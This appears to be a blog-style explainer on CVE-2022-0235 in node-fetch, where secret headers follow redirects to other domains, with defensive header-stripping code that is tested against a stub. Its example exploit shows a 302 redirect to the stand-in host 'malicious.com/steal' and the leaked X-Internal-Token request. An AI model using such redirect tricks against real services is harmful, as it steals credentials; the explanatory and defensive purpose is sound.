Open-source libraries make web development quick and easy. But sometimes, even popular ones contain vulnerabilities that can endanger your applications. One such case was discovered in node-fetch, a widely used library to make HTTP requests in Node.js. This article will explain CVE-2022-0235, which allowed sensitive information to be leaked, walk you through an example, and show how to stay safe.
What is node-fetch?
node-fetch is a lightweight module that brings the window.fetch API to Node.js. It’s a tool used by millions of developers and hundreds of thousands of projects.
```js
const fetch = require('node-fetch');

fetch('https://api.example.com/data')
  .then(res => res.json())
  .then(json => console.log(json));
```
What is CVE-2022-0235?
- CVE-2022-0235 describes a security vulnerability where node-fetch could accidentally send sensitive internal data, like headers or authentication tokens, to external servers.
Affected versions: 2.6.0 - 2.6.6
In simple words: if your app uses node-fetch to access both internal (safe) and external (untrusted) websites, this bug could accidentally send private information to external websites, where attackers could steal it.
How Does the Vulnerability Work?
The bug has to do with the way node-fetch handles HTTP headers. Sometimes, code that fetches internal resources (such as internal APIs) may re-use the same headers in later, possibly external, requests. If a malicious server can control redirection, it can trick node-fetch into sending internal headers — like cookies, API keys, or authentication tokens — to outside domains.
This happens because node-fetch, during redirect handling, did not properly sanitize headers when following redirects to cross-domain targets.
Example Exploit
Let’s look at how a real-world exploit could work.
Scenario
- Your Node.js app fetches http://internal-api.local/data using node-fetch and sends a secret header: X-Internal-Token: super-secret-token.
- But the internal server responds with a 302 Redirect to an external site, like http://malicious.com/steal.
- node-fetch, because of its bug, will follow the redirect and send all the same headers, including your X-Internal-Token, to the external, untrusted server.
Sample Code
```js
const fetch = require('node-fetch');

// Vulnerable code!
fetch('http://internal-api.local/data', {
  headers: {
    'X-Internal-Token': 'super-secret-token',
  },
  redirect: 'follow', // node-fetch will follow all redirects
})
  .then(res => res.json())
  .then(json => console.log(json));
```
If http://internal-api.local/data responds with
```http
HTTP/1.1 302 Found
Location: http://malicious.com/steal
```
Then node-fetch sends
```http
GET /steal HTTP/1.1
Host: malicious.com
X-Internal-Token: super-secret-token <-- BAD!
```
Now, the attacker at malicious.com gets your secret token.
How to Stay Safe
Upgrade node-fetch to a version that is not affected. If you cannot upgrade right away, or want defense in depth, do not let node-fetch follow redirects on its own: set redirect: 'manual' and decide yourself whether, and with which headers, a Location header should be followed.
```js
fetch('http://internal-api.local/data', {
  headers: { 'X-Internal-Token': 'super-secret-token' },
  redirect: 'manual', // Only handle redirects you trust
}).then(res => {
  // 3xx responses come back as-is; check res.headers.get('location') before following
});
```
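One way to do that manual redirect handling, as an added example that is not node-fetch's own code: secret headers are forwarded only when the redirect target shares the original origin, and the fetch function is injected so the article's scenario can be replayed offline against a constructed stub (the header names in SENSITIVE and the makeStubFetch helper are assumptions for this example).

```javascript
// Added example; not node-fetch's own code. Forward a request across redirects
// but only let credential-bearing headers travel to the same origin, which is
// the property the vulnerable versions lacked. `fetchImpl` is injected
// (node-fetch, global fetch, or the constructed stub below) so it runs offline.
const SENSITIVE = new Set(['authorization', 'cookie', 'x-internal-token']);

// Headers to send to `toUrl` after a redirect from `fromUrl`.
function headersForRedirect(fromUrl, toUrl, headers) {
  if (new URL(fromUrl).origin === new URL(toUrl).origin) return { ...headers };
  const kept = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!SENSITIVE.has(name.toLowerCase())) kept[name] = value; // drop secrets cross-origin
  }
  return kept;
}

// Follow redirects manually (redirect: 'manual') so the header set is
// recomputed on every hop instead of being replayed verbatim.
async function fetchWithSafeRedirects(url, opts, fetchImpl, maxHops = 5) {
  let current = url;
  let headers = { ...(opts.headers || {}) };
  for (let hop = 0; hop <= maxHops; hop++) {
    const res = await fetchImpl(current, { ...opts, headers, redirect: 'manual' });
    const location = res.headers.get('location');
    if (res.status < 300 || res.status > 399 || !location) return res;
    const next = new URL(location, current).toString(); // resolve relative Location
    headers = headersForRedirect(current, next, headers);
    current = next;
  }
  throw new Error('too many redirects');
}

// Constructed stub for the article's scenario: the internal API answers with a
// 302 to an external host. Every request it receives is appended to `log`.
function makeStubFetch(log) {
  return async (url, opts) => {
    log.push({ url, headers: opts.headers });
    if (url.startsWith('http://internal-api.local/')) {
      return { status: 302, headers: new Map([['location', 'http://malicious.com/steal']]) };
    }
    return { status: 200, headers: new Map() };
  };
}

// Replay the scenario: the second request (to malicious.com) carries no token.
const log = [];
fetchWithSafeRedirects('http://internal-api.local/data',
  { headers: { 'X-Internal-Token': 'super-secret-token' } }, makeStubFetch(log))
  .then(() => console.log(JSON.stringify(log, null, 2)));
```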
Summary
- CVE-2022-0235 allowed node-fetch to leak sensitive information by following redirects and sending sensitive headers to external servers.
Have you updated your node-fetch yet? Now’s the time!
Timeline
Published on: 01/16/2022 17:15:00 UTC
Last modified on: 01/25/2022 20:00:00 UTC